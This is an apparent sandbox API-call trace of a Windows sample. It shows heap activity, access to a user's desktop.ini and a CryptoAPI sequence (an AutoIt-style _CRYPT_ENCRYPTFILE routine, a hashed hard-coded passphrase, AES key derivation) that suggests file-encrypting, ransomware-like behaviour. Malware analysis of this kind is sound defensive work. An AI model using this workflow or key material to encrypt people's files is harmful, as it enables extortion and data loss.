(lpFileName="C:\\Users\\FD1HVy\\Desktop\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\desktop\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0122.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0122.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9350 [0122.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0122.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0122.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0122.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0122.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0122.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0122.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0122.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0122.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0122.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0122.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0122.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0122.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0122.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a500 [0122.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0122.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0122.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0122.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0122.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0122.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0122.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0122.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0122.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0122.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0122.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0122.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0122.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0122.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0122.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0122.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0122.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0122.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0122.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0122.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0122.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0122.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0122.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0122.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0122.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0122.748] FreeLibrary (hLibModule=0x772d0000) returned 1 [0122.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0122.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0122.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0122.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0122.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0122.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0122.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0122.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0122.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0122.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0122.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0122.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0122.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0122.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0122.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0122.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0122.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0122.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0122.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0122.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0122.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0122.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0122.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0122.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0122.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0122.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0122.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0122.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0122.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0122.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0122.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0122.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0122.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0122.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0122.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0122.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0122.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0122.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0122.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0122.759] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0122.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0122.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0122.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0122.759] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0122.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0122.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0122.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0122.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0122.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0122.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0122.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0122.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0122.759] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0122.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0122.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0122.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0122.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0122.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0122.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0122.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0122.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0122.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0122.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0122.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0122.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0122.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0122.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0122.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0122.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0122.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0122.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0122.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0122.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0122.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0122.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392378 | out: hHeap=0x1780000) returned 1 [0122.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0122.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0122.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0122.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0122.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0122.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0122.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0122.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0122.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0122.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0122.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a500 | out: hHeap=0x1780000) returned 1 [0122.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0122.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0122.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0122.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0122.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0122.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0122.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0122.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0122.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0122.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0122.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0122.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0122.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0122.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0122.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0122.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0122.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0122.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0122.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0122.761] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0122.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9b90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0122.761] CloseHandle (hObject=0x258) returned 1 [0122.762] FreeLibrary (hLibModule=0x772d0000) returned 1 [0122.762] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0122.762] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\desktop.ini", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="desktop.ini", cAlternateFileName="")) returned 0x41ac700 [0122.762] FindClose (in: hFindFile=0x41ac700 | out: hFindFile=0x41ac700) returned 1 [0122.762] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0122.762] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0122.762] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0122.776] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.776] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0122.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796e28, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0122.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0122.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797108, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0122.776] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0122.777] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0122.777] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0122.777] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0122.777] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0122.777] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0122.777] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0122.777] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.777] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0122.777] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0122.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca808, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0122.778] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0122.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0122.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0122.778] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0122.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0122.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e27e8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0122.778] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.778] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0122.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca988, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0122.778] CryptHashData (hHash=0x41ac040, pbData=0x17e2728, dwDataLen=0x22, dwFlags=0x1) returned 1 [0122.778] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.778] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0122.778] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0122.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43caa18, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0122.778] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac040, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac2c0) returned 1 [0122.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 